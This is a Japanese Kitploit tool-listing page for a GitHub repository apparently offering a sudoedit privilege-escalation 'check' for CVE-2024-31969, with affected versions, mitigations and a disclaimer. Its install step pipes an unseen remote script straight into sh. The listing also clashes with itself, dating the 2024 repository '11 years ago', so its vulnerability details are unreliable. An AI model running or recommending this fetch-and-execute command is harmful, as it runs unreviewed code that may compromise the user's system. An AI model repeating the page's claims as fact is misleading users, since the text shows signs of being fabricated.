Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
CVE-2024-31969 — CVE-2024-31969 は、sudoedit を使用する際の sudo におけるローカル権限昇格です。 | Kitploit
ツール/GitHubGitHub/kingfakee7/cve-2024-31969
特権昇格脆弱性分析エクスプロイトペネトレーションテスト学習と教育
GitHubkingfakee7/cve-2024-31969

CVE-2024-31969

CVE-2024-31969 は、sudoedit を使用する際の sudo におけるローカル権限昇格です。

リポジトリを見る
11年前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

📌 CVE-2024-31969

CVE-2024-31969 は、sudoedit コマンドを使用する際の sudo における ローカル権限昇格 の脆弱性です。

この脆弱性は sudo 1.9.0 以降に導入されました。sudoedit がユーザーの環境変数とファイルの所有権を適切に検証しないことが原因です。


📖 説明

sudo 1.9.0 で導入された欠陥で、sudoedit がユーザーの環境変数とファイルの所有権を検証する方法に起因します。

この脆弱性により、sudoedit へのアクセス権を持つローカルユーザーが、SUDO_EDITOR などの環境変数の操作やシンボリックリンクを悪用して、任意のファイルを root として変更できる可能性があります。


📊 影響を受ける Sudo バージョン:

Sudo バージョン状態
1.9.0 → 1.9.15p4🔥 影響あり
1.9.15p5 以降✅ 安全
1.8.x(1.8.23 を含む)❌ 影響なし

📦 インストール方法と使用方法

以下のコマンドを実行してください:

root@kitploit:~
curl -L https://raw.githubusercontent.com/kingfakee7/CVE-2024-31969/main/cve-2024-31969-check.sh | sh

🛠️ 解決策 / 緩和策

  • sudo をバージョン 1.9.15p5 以降に更新してください。
  • 非 root ユーザーに sudoedit を許可する sudoers ルールを制限してください。
  • /etc/sudoers ファイル内で安全な env_keep または env_reset 設定を使用してください。

📚 参照

  • CVE-2024-31969(NVD)

⚠️ 免責事項

このリポジトリは 教育 および セキュリティシステムの文書化 を目的として作成されました。
この情報を違法行為や、システム所有者の書面による許可なく使用することは固く禁じられています。
いかなる悪用も、すべて作成者の責任の範囲外です。

ツールをダウンロード